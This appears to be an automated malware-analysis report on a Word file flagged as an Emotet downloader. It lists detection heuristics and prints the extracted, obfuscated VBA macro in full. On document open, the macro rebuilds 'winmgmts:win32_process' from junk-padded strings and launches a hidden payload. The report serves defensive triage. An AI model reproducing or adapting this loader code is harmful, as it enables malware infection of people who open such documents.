MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed02224-9938637-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.EmotetRed02224-9938637-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_open() -
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8250 bytes |
SHA-256: 2cdc245404bd91793507e2ad809b7a2ef368477f6d691e184ece3a4f067eabcc |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
123 of 199 identifiers look randomly generated (e.g. 'Xhlj9irufb65_wekzf') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Xlb0g5eyj545" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() Jotxu6biv0471oy0 End Sub Attribute VB_Name = "Bt08uhxu1tnhy1" Attribute VB_Name = "Xhlj9irufb65_wekzf" Function Jotxu6biv0471oy0() On Error Resume Next mKbjhqs = Xlb0g5eyj545.StoryRanges.Item(244 / 244) GoTo aMSHGI Dim VWDNpuI() As Byte Dim FmdzUop As Integer FmdzUop = FreeFile Open "F:\emayA\cEXRoDjH\VwIACIE.cAhxFlQk" For Binary Access Read As #FmdzUop Open "O:\vzKFL\xTplfDEO\UzdPBJhtk.FxjwCGqT" For Binary Access Read As #FmdzUop ReDim VWDNpuI(1 To LOF(intGend) - 5) Get #FmdzUop, , VWDNpuI Get #FmdzUop, , VWDNpuI Get #FmdzUop, , VWDNpuI Close #FmdzUop aMSHGI: snahbsd = "]b2[sp]b2[s" Mvmowvl61pq1 = "]b2[sro]b2[s]b2[sce]b2[ss]b2[ss]b2[s]b2[s" GoTo BaaeH Dim GEdfI() As Byte Dim HHIaF As Integer HHIaF = FreeFile Open "F:\JJhGoHJAy\mhYgHAECB\ScIqGCAp.sgqtGoGFB" For Binary Access Read As #HHIaF Open "O:\skwqjIHSw\BGDBEtNI\SVgGCDCe.oeVOIAwo" For Binary Access Read As #HHIaF ReDim GEdfI(1 To LOF(intGend) - 5) Get #HHIaF, , GEdfI Get #HHIaF, , GEdfI Get #HHIaF, , GEdfI Close #HHIaF BaaeH: W_z0xk65anh723p = "]b2[s:w]b2[s]b2[sin]b2[s3]b2[s2]b2[s_]b2[s" GoTo QrZrL Dim sIjWJBH() As Byte Dim jKkUJJZ As Integer jKkUJJZ = FreeFile Open "F:\MIXPEQq\xrgAtKF\wbeXEF.fMufiCa" For Binary Access Read As #jKkUJJZ Open "O:\gtNTBHAA\pRTARkP\omJGJZDcR.TSCsY" For Binary Access Read As #jKkUJJZ ReDim sIjWJBH(1 To LOF(intGend) - 5) Get #jKkUJJZ, , sIjWJBH Get #jKkUJJZ, , sIjWJBH Get #jKkUJJZ, , sIjWJBH Close #jKkUJJZ QrZrL: Bcu4d7izwi5q = "w]b2[sin]b2[sm]b2[sgm]b2[st]b2[s]b2[s" GoTo zDLxpKAFE Dim PFNPd() As Byte Dim nBVGMJ As Integer nBVGMJ = FreeFile Open "F:\KzjhHR\fTZqG\WLFeZHJ.RQtHHgTHi" For Binary Access Read As #nBVGMJ Open "O:\xfHgsuZ\OuWcHBRFs\aVDcAfBmF.wxMQaJA" For Binary Access Read As #nBVGMJ ReDim PFNPd(1 To LOF(intGend) - 5) Get #nBVGMJ, , PFNPd Get #nBVGMJ, , PFNPd Get #nBVGMJ, , PFNPd Close #nBVGMJ zDLxpKAFE: Md7uay_rjhi = "]b2[ss]b2[s" GoTo OuPbAWEJB Dim KnLfUEp() As Byte Dim abJXtUnJ As Integer abJXtUnJ = FreeFile Open "F:\qyUZgDN\BGtxCFHH\NTfeA.DExaE" For Binary Access Read As #abJXtUnJ Open "O:\aIUpFwC\nTpvYbID\cOpRCH.yenkEdEBG" For Binary Access Read As #abJXtUnJ ReDim KnLfUEp(1 To LOF(intGend) - 5) Get #abJXtUnJ, , KnLfUEp Get #abJXtUnJ, , KnLfUEp Get #abJXtUnJ, , KnLfUEp Close #abJXtUnJ OuPbAWEJB: C_tmpi32le9 = Bcu4d7izwi5q + Md7uay_rjhi + W_z0xk65anh723p + snahbsd + Mvmowvl61pq1 GoTo uwrli Dim KcYzD() As Byte Dim DLbwIFKRv As Integer DLbwIFKRv = FreeFile Open "F:\BokkBJR\JVqtTl\wBdFDGCm.csxtJBIHA" For Binary Access Read As #DLbwIFKRv Open "O:\zDxufIC\iCExC\ZRtuVA.YMVmJ" For Binary Access Read As #DLbwIFKRv ReDim KcYzD(1 To LOF(intGend) - 5) Get #DLbwIFKRv, , KcYzD Get #DLbwIFKRv, , KcYzD Get #DLbwIFKRv, , KcYzD Close #DLbwIFKRv uwrli: H4qcty67722xqmrmn = Lehj73snaqzhyepdw9(C_tmpi32le9) GoTo JpnbIUF Dim jLIIJFE() As Byte Dim GigmCE As Integer GigmCE = FreeFile Open "F:\tzCMq\XMchB\YUPCDfDKL.EffNJq" For Binary Access Read As #GigmCE Open "O:\ZGlzCsC\TtOjBxE\gAFGG.ByczYWAGo" For Binary Access Read As #GigmCE ReDim jLIIJFE(1 To LOF(intGend) - 5) Get #GigmCE, , jLIIJFE Get #GigmCE, , jLIIJFE Get #GigmCE, , jLIIJFE Close #GigmCE JpnbIUF: Set Fcqv6woostm0 = CreateObject(H4qcty67722xqmrmn) GoTo OstReD Dim HXWoFCJP() As Byte Dim gGHPnUA As Integer gGHPnUA = FreeFile Open "F:\yhIgJCIMF\qsJDB\PptZC.VCOUrPxF" For Binary Access Read As #gGHPnUA Open "O:\cRwnDC\zYXqog\gNodA.UMeMIyH" For Binary Access Read As #gGHPnUA ReDim HXWoFCJP(1 To LOF(intGend) - 5) Get #gGHPnUA, , HXWoFCJP Get #gGHPnUA, , HXWoFCJP Get #gGHPnUA, , HXWoFCJP Close #gGHPnUA OstReD: Ma9hdg7q365lpb = Mid(mKbjhqs, (2 + 3), Len(mKbjhqs)) GoTo XRvZBDBD Dim nTckscaDq() As Byte Dim pYTRxECC As Integer pYTRxECC = FreeFile Open "F:\SVdfFCU\nnqUrp\YWmSNHII.kFjgBgDk" For Binary Access Read As #pYTRxECC Open "O:\NCeDGUAx\liGyAIZj\lUyiD.VfSxEM" For Binary Access Read As #pYTRxECC ReDim nTckscaDq(1 To LOF(intGend) - 5) Get #pYTRxECC, , nTckscaDq Get #pYTRxECC, , nTckscaDq Get #pYTRxECC, , nTckscaDq Close #pYTRxECC XRvZBDBD: GoTo oMoXwHAi Dim HNtcACoR() As Byte Dim zaZqi As Integer zaZqi = FreeFile Open "F:\nByRqYG\TFriHa\TImuB.vzTdgVSJ" For Binary Access Read As #zaZqi Open "O:\OoAuHBF\TrVff\lRegJKh.zDCEsFDJE" For Binary Access Read As #zaZqi ReDim HNtcACoR(1 To LOF(intGend) - 5) Get #zaZqi, , HNtcACoR Get #zaZqi, , HNtcACoR Get #zaZqi, , HNtcACoR Close #zaZqi oMoXwHAi: Fcqv6woostm0.Create Lehj73snaqzhyepdw9(Ma9hdg7q365lpb), Ndofzqkqt8o8ky4, Es2mklc5pr30boja GoTo vSgqJI Dim uqjqkyHX() As Byte Dim ovskCI As Integer ovskCI = FreeFile Open "F:\UkqzBHD\AfilMCw\FaEXXAH.VJBQHBwD" For Binary Access Read As #ovskCI Open "O:\uYQKM\KtKdHCsGD\lkgPV.CtEPFIa" For Binary Access Read As #ovskCI ReDim uqjqkyHX(1 To LOF(intGend) - 5) Get #ovskCI, , uqjqkyHX Get #ovskCI, , uqjqkyHX Get #ovskCI, , uqjqkyHX Close #ovskCI vSgqJI: GoTo iNgaE Dim DCGxZIHE() As Byte Dim FELuBTD As Integer FELuBTD = FreeFile Open "F:\AlLTF\KjklIF\ZbOCaDfmF.zRWqJ" For Binary Access Read As #FELuBTD Open "O:\CSYaI\BeKGII\ISlAUHBA.hUrieDEBA" For Binary Access Read As #FELuBTD ReDim DCGxZIHE(1 To LOF(intGend) - 5) Get #FELuBTD, , DCGxZIHE Get #FELuBTD, , DCGxZIHE Get #FELuBTD, , DCGxZIHE Close #FELuBTD iNgaE: End Function Function Lehj73snaqzhyepdw9(Wft58t8kair) On Error Resume Next GoTo WvseC Dim pKryCIHFC() As Byte Dim GvYvntR As Integer GvYvntR = FreeFile Open "F:\CmcVFs\XishGzBCo\hcyLYIRH.wmCZaBADB" For Binary Access Read As #GvYvntR Open "O:\QYYEIdD\lneIGGHdk\tPJGEIe.xXBLI" For Binary Access Read As #GvYvntR ReDim pKryCIHFC(1 To LOF(intGend) - 5) Get #GvYvntR, , pKryCIHFC Get #GvYvntR, , pKryCIHFC Get #GvYvntR, , pKryCIHFC Close #GvYvntR WvseC: Gybrsxbkupnb96n = (Wft58t8kair) GoTo DtPcJVH Dim LveTGO() As Byte Dim CMVnWpNGG As Integer CMVnWpNGG = FreeFile Open "F:\LvKnA\BOtUEZATF\XZQseKaFA.wNmzM" For Binary Access Read As #CMVnWpNGG Open "O:\rueRG\VzWpbFH\IjzjDqRCA.NfKzekAB" For Binary Access Read As #CMVnWpNGG ReDim LveTGO(1 To LOF(intGend) - 5) Get #CMVnWpNGG, , LveTGO Get #CMVnWpNGG, , LveTGO Get #CMVnWpNGG, , LveTGO Close #CMVnWpNGG DtPcJVH: Htqq1guc2d740 = Jumkzxvtzz2s(Gybrsxbkupnb96n) GoTo VSmdWBCHE Dim TOmTI() As Byte Dim IyJitF As Integer IyJitF = FreeFile Open "F:\rRIMGI\pwZWJ\AvgVBxG.OaxnnLJb" For Binary Access Read As #IyJitF Open "O:\vzest\bkKRAHG\viWaCHFyl.borAIDhH" For Binary Access Read As #IyJitF ReDim TOmTI(1 To LOF(intGend) - 5) Get #IyJitF, , TOmTI Get #IyJitF, , TOmTI Get #IyJitF, , TOmTI Close #IyJitF VSmdWBCHE: Lehj73snaqzhyepdw9 = Htqq1guc2d740 GoTo qQuwLC Dim erxovx() As Byte Dim FRpvMrG As Integer FRpvMrG = FreeFile Open "F:\bdvnDGG\YcExI\ktRsYELAd.fmxbB" For Binary Access Read As #FRpvMrG Open "O:\hTNkC\vnsiEILT\lOvmX.DAaIToDF" For Binary Access Read As #FRpvMrG ReDim erxovx(1 To LOF(intGend) - 5) Get #FRpvMrG, , erxovx Get #FRpvMrG, , erxovx Get #FRpvMrG, , erxovx Close #FRpvMrG qQuwLC: End Function Function Jumkzxvtzz2s(Fuws4dl87mo) Mjjc2_q8vgjc36 = G9cdtgijbhc3ewc GoTo OkxlX Dim XUiHBHHUH() As Byte Dim VGYhDjxf As Integer VGYhDjxf = FreeFile Open "F:\KqqRCCD\OxxrCn\eQUMRH.ZdxMJ" For Binary Access Read As #VGYhDjxf Open "O:\ikJcU\cGIxAAG\fEBwJJ.UFkBBLGk" For Binary Access Read As #VGYhDjxf ReDim XUiHBHHUH(1 To LOF(intGend) - 5) Get #VGYhDjxf, , XUiHBHHUH Get #VGYhDjxf, , XUiHBHHUH Get #VGYhDjxf, , XUiHBHHUH Close #VGYhDjxf OkxlX: Jumkzxvtzz2s = Replace(Fuws4dl87mo, "]b2[s", Dh8iwtx_gbrodi) GoTo XDAaIBnI Dim YVAKAT() As Byte Dim yhCeYdDx As Integer yhCeYdDx = FreeFile Open "F:\KrczWMd\cxBwEA\spjtC.VvknDGZ" For Binary Access Read As #yhCeYdDx Open "O:\VoJkkBWBC\NcgoF\KcMVOEFe.igOXKnIU" For Binary Access Read As #yhCeYdDx ReDim YVAKAT(1 To LOF(intGend) - 5) Get #yhCeYdDx, , YVAKAT Get #yhCeYdDx, , YVAKAT Get #yhCeYdDx, , YVAKAT Close #yhCeYdDx XDAaIBnI: End Function |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.